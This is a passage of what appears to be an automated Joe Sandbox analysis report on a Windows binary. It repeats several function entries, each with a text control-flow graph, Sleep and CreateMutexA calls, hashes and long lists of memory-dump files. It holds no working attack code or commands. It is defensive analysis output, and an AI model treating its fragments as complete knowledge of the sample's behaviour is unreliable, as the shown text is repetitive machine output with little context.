                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 76e19588f7a3ed4331b089b1837b97b62952a63035631d6f7dc8abbcdacccf56
                                                                                                                                                                                                                                                  • Instruction ID: 5af64dc7abd01eba4b499ded80c24c220439dd60c3cf80fc82342adab7eadc31
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76e19588f7a3ed4331b089b1837b97b62952a63035631d6f7dc8abbcdacccf56
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 82314A31B051449BFF089B7DDC8DB9EB762AB86330F204619E454A73D1D7768981A712
                                                                                                                                                                                                                                                  Function 00F3A418 Relevance: 3.1, APIs: 2, Instructions: 133sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 678 f3a418-f3a438 682 f3a466-f3a482 678->682 683 f3a43a-f3a446 678->683 686 f3a4b0-f3a4cf 682->686 687 f3a484-f3a490 682->687 684 f3a448-f3a456 683->684 685 f3a45c-f3a463 call f4d663 683->685 684->685 692 f3a93f-f3a949 call f66c6a * 2 684->692 685->682 690 f3a4d1-f3a4dd 686->690 691 f3a4fd-f3a916 call f480c0 686->691 688 f3a492-f3a4a0 687->688 689 f3a4a6-f3a4ad call f4d663 687->689 688->689 688->692 689->686 695 f3a4f3-f3a4fa call f4d663 690->695 696 f3a4df-f3a4ed 690->696 709 f3a94e 692->709 710 f3a949 call f66c6a 692->710 695->691 696->692 696->695 711 f3a953-f3a994 Sleep CreateMutexA 709->711 712 f3a94e call f66c6a 709->712 710->709 714 f3a9a7-f3a9a8 711->714 715 f3a996-f3a998 711->715 712->711 715->714 716 f3a99a-f3a9a5 715->716 716->714
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00F3A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00F93254), ref: 00F3A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 86e9e227651578f6ca253a3698caf063b588c14663cbeada7b42b649484a67e0
                                                                                                                                                                                                                                                  • Instruction ID: 4fb7a7fcb6b86dfdf0eaaccd960b63d296ad0e35a37d59b953d25416e1df33f7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86e9e227651578f6ca253a3698caf063b588c14663cbeada7b42b649484a67e0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A311531B041049BEB08DB78DC8DBADB762EBC1330F244619E494E72D5D7798981A762
                                                                                                                                                                                                                                                  Function 00F3A54D Relevance: 3.1, APIs: 2, Instructions: 132sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 718 f3a54d-f3a56d 722 f3a59b-f3a5b7 718->722 723 f3a56f-f3a57b 718->723 726 f3a5e5-f3a604 722->726 727 f3a5b9-f3a5c5 722->727 724 f3a591-f3a598 call f4d663 723->724 725 f3a57d-f3a58b 723->725 724->722 725->724 728 f3a944-f3a949 call f66c6a 725->728 732 f3a632-f3a916 call f480c0 726->732 733 f3a606-f3a612 726->733 730 f3a5c7-f3a5d5 727->730 731 f3a5db-f3a5e2 call f4d663 727->731 745 f3a94e 728->745 746 f3a949 call f66c6a 728->746 730->728 730->731 731->726 737 f3a614-f3a622 733->737 738 f3a628-f3a62f call f4d663 733->738 737->728 737->738 738->732 748 f3a953-f3a994 Sleep CreateMutexA 745->748 749 f3a94e call f66c6a 745->749 746->745 752 f3a9a7-f3a9a8 748->752 753 f3a996-f3a998 748->753 749->748 753->752 754 f3a99a-f3a9a5 753->754 754->752
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00F3A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00F93254), ref: 00F3A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: b0a0c1d6afb36b3f56dc219c558742712d8c640fdb0c81b502d65f65237b3400
                                                                                                                                                                                                                                                  • Instruction ID: 19ac216763672e8a599fe4207da5789a863282813567cf312c1efd90e0284d34
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b0a0c1d6afb36b3f56dc219c558742712d8c640fdb0c81b502d65f65237b3400
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2311831B051048BEF08DB79DC89BADB762EBC5334F244619E494E73D5C7798981A722
                                                                                                                                                                                                                                                  Function 00F3A682 Relevance: 3.1, APIs: 2, Instructions: 131sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 756 f3a682-f3a6a2 760 f3a6d0-f3a6ec 756->760 761 f3a6a4-f3a6b0 756->761 762 f3a71a-f3a739 760->762 763 f3a6ee-f3a6fa 760->763 764 f3a6b2-f3a6c0 761->764 765 f3a6c6-f3a6cd call f4d663 761->765 770 f3a767-f3a916 call f480c0 762->770 771 f3a73b-f3a747 762->771 768 f3a710-f3a717 call f4d663 763->768 769 f3a6fc-f3a70a 763->769 764->765 766 f3a949 764->766 765->760 773 f3a94e 766->773 774 f3a949 call f66c6a 766->774 768->762 769->766 769->768 777 f3a749-f3a757 771->777 778 f3a75d-f3a764 call f4d663 771->778 780 f3a953-f3a994 Sleep CreateMutexA 773->780 781 f3a94e call f66c6a 773->781 774->773 777->766 777->778 778->770 788 f3a9a7-f3a9a8 780->788 789 f3a996-f3a998 780->789 781->780 789->788 790 f3a99a-f3a9a5 789->790 790->788
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00F3A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,00F93254), ref: 00F3A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1759458259.0000000000F31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759443355.0000000000F30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759458259.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759511763.0000000000F99000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759525849.0000000000F9B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759541568.0000000000FA7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759637832.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759654928.000000000110B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759671379.0000000001119000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759685576.000000000111B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759700737.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759727179.000000000112B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759741488.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759754002.000000000112E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759766363.000000000112F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759781070.000000000113A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759793764.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759809937.0000000001157000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759824065.0000000001166000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759835941.0000000001167000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759848218.000000000116A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759867855.0000000001185000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759880340.0000000001186000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759893441.000000000118E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759911534.000000000118F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1759999410.0000000001190000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760012717.0000000001195000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760026729.0000000001196000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760042541.000000000119A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760057398.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760072076.00000000011A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760085770.00000000011A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760100453.00000000011B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760114641.00000000011B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760128206.00000000011B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760141516.00000000011BA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760155031.00000000011C2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760172883.00000000011D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760187702.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760201887.00000000011D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760216088.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760256251.0000000001215000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760270146.0000000001216000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760289447.000000000122B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760304906.000000000122C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760320318.0000000001231000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760344086.0000000001233000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760362786.0000000001242000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1760377727.0000000001243000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_f30000_file.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: 439f4ccce94a5cf1ebc3f96086e3d755fc06da328aebbb8a43ace5da63eb4e60
                                                                                                                                                                                                                                                  • Instruction ID: a9448a60815ff1a91b83f07089742fb24d93a0b94ec8a79c6a9284faa08fd4db
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 439f4ccce94a5cf1ebc3f96086e3d755fc06da328aebbb8a43ace5da63eb4e60
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64312831B051049BEF08DB79DCC9BADBB72DB82330F248619E494E73D1D7798981A762
                                                                                                                                                                                                                                                  Function 00F39ADC Relevance: 3.1, APIs: 2, Instructions: 107sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
